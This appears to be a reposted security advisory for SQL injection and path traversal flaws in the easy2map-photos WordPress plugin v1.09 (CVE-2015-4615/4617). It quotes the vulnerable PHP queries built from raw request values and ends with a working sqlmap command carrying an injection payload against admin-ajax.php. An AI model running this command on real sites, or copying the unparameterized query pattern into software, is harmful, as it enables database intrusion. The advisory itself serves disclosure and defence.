Title: SQL Injection in easy2map-photos wordpress plugin v1.09 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-08 Download Site: https://wordpress.org/plugins/easy2map-photos Vendor: Steven Ellis Vendor Notified: 2015-06-08, fixed in v1.1.0 Vendor Contact: https://profiles.wordpress.org/stevenellis/ Advisory: http://www.vapid.dhs.org/advisory.php?v=130 Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries. Vulnerability: The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input. 48 $wpdb->query(sprintf("UPDATE $mapsTable 49 SET PolyLines = '%s' 50 WHERE ID = '%s';", $PolyLines, $mapID)); 218 $wpdb->query(sprintf(" 219 UPDATE $mapsTable 220 SET TemplateID = '%s', 221 MapName = '%s', 222 Settings = '%s', 223 CSSValues = '%s', 224 CSSValuesPhoto = '%s', 225 CSSValuesMap = '%s', 226 MapHTML = '%s', 227 IsActive = 1 228 WHERE ID = %s;", 229 $_REQUEST['mapTemplateName'], 230 $_REQUEST['mapName'], 231 urldecode($_REQUEST['mapSettingsXML']), 232 urldecode($_REQUEST["parentCSSXML"]), 233 urldecode($_REQUEST["photoCSSXML"]), 234 urldecode($_REQUEST["mapCSSXML"]), 235 urldecode($_REQUEST["mapHTML"]), $mapID)); 238 //this is a map insert 239 if (!$wpdb->query(sprintf(" 240 INSERT INTO $mapsTable( 241 TemplateID, 242 MapName, 243 DefaultPinImage, 244 Settings, 245 LastInvoked, 246 PolyLines, 247 CSSValues, 248 CSSValuesPhoto, 249 CSSValuesMap, 250 MapHTML, 251 IsActive 252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);", 253 $_REQUEST['mapTemplateName'], 254 $_REQUEST['mapName’] 331 $wpdb->query(sprintf(" 332 UPDATE $mapsTable 333 SET MapName = '%s' 334 IsActive = 1 335 WHERE ID = %s;", 336 $_REQUEST['mapName'], 337 $mapID)); Also In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters: if (!file_exists($imagesDirectory)) { mkdir($imagesDirectory); } CVEID: 2015-4615 2015-4617 OSVDB: Exploit Code: • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3 # Iranian Exploit DataBase = http://IeDb.Ir [2015-07-10]